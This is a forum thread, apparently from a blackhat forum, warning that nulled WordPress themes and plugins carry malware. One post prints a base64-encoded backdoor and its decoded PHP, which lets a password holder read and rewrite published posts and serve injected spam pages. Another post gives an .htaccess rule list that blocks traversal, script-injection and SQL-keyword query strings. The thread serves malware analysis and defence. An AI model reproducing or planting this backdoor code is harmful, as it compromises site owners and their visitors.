| Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
|
11-15-2016, 05:33 AM
Post: #11
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
Thanks for the heads up again, people do become complacent when using these sites, ALWAYS ALWAYS ALWAYS double check as the OP says, to many w*nkers out there for sure
|
|||
|
11-15-2016, 05:38 AM
Post: #12
|
|||
|
|||
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
(11-15-2016 05:27 AM)jendaceo Wrote:(11-15-2016 03:50 AM)hey011 Wrote:(11-15-2016 03:05 AM)jendaceo Wrote:(11-15-2016 02:50 AM)Gadzookz Wrote: Don't for a second think all shares are done to help this wonderful community. Always do your own checking. virustotal cannot scan password protected shares unless you unpack the file, and repack without the password. Files from sites that share nulled scripts and themes, etc. will most likely be infected. Do your homework. Here's a link to one of the common malicious injections found in nulled shares: http://stackoverflow.com/questions/40350...do-in-php/ I use these sites: http://themecheck.org/#ancreSubmit/ https://www.{{{Blocked by Omni Potens, reason: reports from LEGIT GB STARTER}}}/ https://www.unphp.net/ |
|||
|
11-15-2016, 05:40 AM
Post: #13
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
Hhm..scan with Virustotal is not enough ...Virustotal will become a lazy stupid solution for security problems on themes...I can create a code line for requesting a script from other sites and Virustotal is really BlindMan with it.
|
|||
|
11-15-2016, 05:46 AM
(This post was last modified: 11-15-2016 05:48 AM by gho5t.)
Post: #14
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
Well, I ran VirusTotal and it did find the infected file in question:
tmg-plugin.php: Code: <?phpI tried to decrypt it, but no luck. Would love to see what's behind the obfuscated parts. Please post your findings back to this thread is you can figure this out! :) |
|||
|
11-15-2016, 05:58 AM
Post: #15
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
@Gadzookz - Awesome suggestion! http://themecheck.org/#ancreSubmit/
 |
|||
|
11-15-2016, 06:06 AM
Post: #16
|
|||
|
|||
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
(11-15-2016 05:46 AM)jendaceo Wrote: Well, I ran VirusTotal and it did find the infected file in question: This code installs a script that rewrites your posts to whatever the hacker wants. This code decrypted: PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0+Z2V0X3Jlc3VsdHMoJ1NFTEVDVCAqIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBXSEVSRSBgcG9zdF9zdGF0dXNgID0gInB1Ymxpc2giIEFORCBgcG9zdF90eXBlYCA9ICJwb3N0IiBPUkRFUiBCWSBgSURgIERFU0MnLCBBUlJBWV9BKSBhcyAkZGF0YSkKCQkJCQkJewoJCQkJCQkJJGRhdGFbJ2NvZGUnXSA9ICcnOwoJCQkJCQkJCgkJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAkZGF0YVsncG9zdF9jb250ZW50J10sICRfKSkKCQkJCQkJCQl7CgkJCQkJCQkJCSRkYXRhWydjb2RlJ10gPSAkX1sxXTsKCQkJCQkJCQl9CgkJCQkJCQkKCQkJCQkJCXByaW50ICc8ZT48dz4xPC93Pjx1cmw+JyAuICRkYXRhWydndWlkJ10gLiAnPC91cmw+PGNvZGU+JyAuICRkYXRhWydjb2RlJ10gLiAnPC9jb2RlPjxpZD4nIC4gJGRhdGFbJ0lEJ10gLiAnPC9pZD48L2U+JyAuICJcclxuIjsKCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ3NldF9pZF9saW5rcyc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnZGF0YSddKSkKCQkJCQkJewoJCQkJCQkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgYHBvc3RfY29udGVudGAgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAncG9zdHNgIFdIRVJFIGBJRGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkuJyInKTsKCQkJCQkJCQoJCQkJCQkJJHBvc3RfY29udGVudCA9IHByZWdfcmVwbGFjZSgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAnJywgJGRhdGEgLT4gcG9zdF9jb250ZW50KTsKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWydkYXRhJ10pKSAkcG9zdF9jb250ZW50ID0gJHBvc3RfY29udGVudCAuICc8ZGl2IGlkPSJ3cF9jZF9jb2RlIj4nIC4gc3RyaXBjc2xhc2hlcygkX1JFUVVFU1RbJ2RhdGEnXSkgLiAnPC9kaXY+JzsKCgkJCQkJCQlpZiAoJHdwZGItPnF1ZXJ5KCdVUERBVEUgYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBTRVQgYHBvc3RfY29udGVudGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJHBvc3RfY29udGVudCkgLiAnIiBXSEVSRSBgSURgID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkgLiAnIicpICE9PSBmYWxzZSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQljYXNlICdjcmVhdGVfcGFnZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsncmVtb3ZlX3BhZ2UnXSkpCgkJCQkJCXsKCQkJCQkJCWlmICgkd3BkYiAtPiBxdWVyeSgnREVMRVRFIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2RhdGFsaXN0YCBXSEVSRSBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciJykpCgkJCQkJCQkJewoJCQkJCQkJCQlwcmludCAidHJ1ZSI7CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQkJZWxzZWlmIChpc3NldCgkX1JFUVVFU1RbJ2NvbnRlbnQnXSkgJiYgIWVtcHR5KCRfUkVRVUVTVFsnY29udGVudCddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiIC0+IHF1ZXJ5KCdJTlNFUlQgSU5UTyBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFNFVCBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciLCBgdGl0bGVgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ3RpdGxlJ10pLiciLCBga2V5d29yZHNgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2tleXdvcmRzJ10pLiciLCBgZGVzY3JpcHRpb25gID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Rlc2NyaXB0aW9uJ10pLiciLCBgY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnY29udGVudCddKS4nIiwgYGZ1bGxfY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZnVsbF9jb250ZW50J10pLiciIE9OIERVUExJQ0FURSBLRVkgVVBEQVRFIGB0aXRsZWAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndGl0bGUnXSkuJyIsIGBrZXl3b3Jkc2AgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsna2V5d29yZHMnXSkuJyIsIGBkZXNjcmlwdGlvbmAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGVzY3JpcHRpb24nXSkuJyIsIGBjb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcodXJsZGVjb2RlKCRfUkVRVUVTVFsnY29udGVudCddKSkuJyIsIGBmdWxsX2NvbnRlbnRgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Z1bGxfY29udGVudCddKS4nIicpKQoJCQkJCQkJCXsKCQkJCQkJCQkJcHJpbnQgInRydWUiOwoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVVJMX0NEIjsKCQkJfQoJCQkKCQlkaWUoIiIpOwoJfQoKCQppZiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyggJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gKS4nIicpID09ICcxJyApCgl7CgkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgKiBGUk9NIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4nIicpOwoJCWlmICgkZGF0YSAtPiBmdWxsX2NvbnRlbnQpCgkJCXsKCQkJCXByaW50IHN0cmlwc2xhc2hlcygkZGF0YSAtPiBjb250ZW50KTsKCQkJfQoJCWVsc2UKCQkJewoJCQkJcHJpbnQgJzwhRE9DVFlQRSBodG1sPic7CgkJCQlwcmludCAnPGh0bWwgJzsKCQkJCWxhbmd1YWdlX2F0dHJpYnV0ZXMoKTsKCQkJCXByaW50ICcgY2xhc3M9Im5vLWpzIj4nOwoJCQkJcHJpbnQgJzxoZWFkPic7CgkJCQlwcmludCAnPHRpdGxlPicuc3RyaXBzbGFzaGVzKCRkYXRhIC0+IHRpdGxlKS4nPC90aXRsZT4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBrZXl3b3JkcykuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBkZXNjcmlwdGlvbikuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0iaW5kZXgsIGZvbGxvdyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIGNoYXJzZXQ9Iic7CgkJCQlibG9naW5mbyggJ2NoYXJzZXQnICk7CgkJCQlwcmludCAnIiAvPic7CgkJCQlwcmludCAnPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCI+JzsKCQkJCXByaW50ICc8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPic7CgkJCQlwcmludCAnPGxpbmsgcmVsPSJwaW5nYmFjayIgaHJlZj0iJzsKCQkJCWJsb2dpbmZvKCAncGluZ2JhY2tfdXJsJyApOwoJCQkJcHJpbnQgJyI+JzsKCQkJCXdwX2hlYWQoKTsKCQkJCXByaW50ICc8L2hlYWQ+JzsKCQkJCXByaW50ICc8Ym9keT4nOwoJCQkJcHJpbnQgJzxkaXYgaWQ9ImNvbnRlbnQiIGNsYXNzPSJzaXRlLWNvbnRlbnQiPic7CgkJCQlwcmludCBzdHJpcHNsYXNoZXMoJGRhdGEgLT4gY29udGVudCk7CgkJCQlnZXRfc2VhcmNoX2Zvcm0oKTsKCQkJCWdldF9zaWRlYmFyKCk7CgkJCQlnZXRfZm9vdGVyKCk7CgkJCX0KCQkJCgkJZXhpdDsKCX0KCgo/Pg== Is this: <?php if (isset($_REQUEST['action']) and& isset($_REQUEST['password']) and& ($_REQUEST['password'] == '{$PASSWORD}')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n"; } break; case 'set_id_links'; if (isset($_REQUEST['data'])) { $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"'); $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content); if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>'; if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) { print "true"; } } break; case 'create_page'; if (isset($_REQUEST['remove_page'])) { if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')) { print "true"; } } elseif (isset($_REQUEST['content']) and& !empty($_REQUEST['content'])) { if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')) { print "true"; } } break; default: print "ERROR_WP_ACTION WP_URL_CD"; } die(""); } if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) { $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); if ($data -> full_content) { print stripslashes($data -> content); } else { print '<!DOCTYPE html>'; print '<html '; language_attributes(); print ' class="no-js">'; print '<head>'; print '<title>'.stripslashes($data -> title).'</title>'; print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />'; print '<meta name="Description" content="'.stripslashes($data -> description).'" />'; print '<meta name="robots" content="index, follow" />'; print '<meta charset="'; bloginfo( 'charset' ); print '" />'; print '<meta name="viewport" content="width=device-width">'; print '<link rel="profile" href="http://gmpg.org/xfn/11">'; print '<link rel="pingback" href="'; bloginfo( 'pingback_url' ); print '">'; wp_head(); print '</head>'; print '<body>'; print '<div id="content" class="site-content">'; print stripslashes($data -> content); get_search_form(); get_sidebar(); get_footer(); } exit; } ?> First, it adds a file to your wp includes folder named: wp-cd.php It also adds code to your theme functions.php file. Basically, if you create posts that match the keywords the hacker is interested in, he or she can then rewrite that post to include whatever the hacker wants. |
|||
|
11-15-2016, 06:10 AM
Post: #17
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
Adding this to your htaccess file can defend against alot of nastiness:
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC] RewriteRule ^(.*)$ - [F,L] RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR] RewriteCond %{QUERY_STRING} boot\.ini [NC,OR] RewriteCond %{QUERY_STRING} tag\= [NC,OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|ê|"|;|\?|\*|=$).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(and#x22;|and#x27;|and#x3C;|and#x3E;|and#x5C;|and#x7B;|and#x7C;).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC] RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$ RewriteRule ^(.*)$ - [F,L] </IfModule> |
|||
|
11-15-2016, 06:22 AM
Post: #18
|
|||
|
|||
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
(11-15-2016 06:10 AM)Gadzookz Wrote: Adding this to your htaccess file can defend against alot of nastiness: Excellent. I use themecheck for the Boombox Themes from (he did share many themes in Softwares Section and redirect to his site [Reported by Members as SPAM THREAD] dot com to download)...And this result is:(from null24) Line 19: echo @file_get_contents( $footer_pattern_path ); Line 19: echo @file_get_contents( $header_pattern_path ); His share here: http://bestblackhatforum.com/Thread-GET-...ht=boombox Maybe it will get file from other sites? 
|
|||
|
11-15-2016, 06:23 AM
(This post was last modified: 11-15-2016 06:29 AM by berlinerin.)
Post: #19
|
|||
|
|||
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
(11-15-2016 05:40 AM)dccountrydz Wrote: Hhm..scan with Virustotal is not enough ...Virustotal will become a lazy stupid solution for security problems on themes...I can create a code line for requesting a script from other sites and Virustotal is really BlindMan with it. yes and for normal big file not! I hope for wordpress one day comes out a good virus/malware Cleaner. I really think of making html-sides, instead of wp sites !!!
____________________________________________________________
✨⭐⭐️️  ⭐⭐️️✨____________________________________________________________ ✨ OPEN A NEW ETSY SHOP WITH THIS FREE 40 LISTINGS FOR 4 MONTH! https://etsy.me/3MVv7ZI ✨ |
|||
|
11-15-2016, 06:30 AM
Post: #20
|
|||
|
|||
|
RE: [WARNING] Virus Infected Themes / Plugins From Popular "Nulled" Websites
What's the difference between .rar and .zip files?
Recently I've downloaded a Nulled WP plugin. I unzipped and compressed again with Winrar(.rar) and got one virus. https://www.virustotal.com/en/file/ba61e.../analysis/ SHA256: ba61e351a47f207bd1fe6ac99171adefa0a4e1fa9b83b33b1f1ec078fbc7e038 File name: upload.rar Detection ratio: 1 / 53 Analysis date: 2016-11-10 20:36:44 UTC ( 3 days, 23 hours ago ) I again compressed it today by windows default system and got a .zip file. But this time its clean https://www.virustotal.com/en/file/f5996...479154631/ SHA256: f5996fc0018fef296ed0878b7e619d616041076ed3ae94c62e38f7f6c72f3f71 File name: load.zip Detection ratio: 0 / 54 Analysis date: 2016-11-14 20:17:11 UTC ( 10 minutes ago ) So, what happened?  |
|||
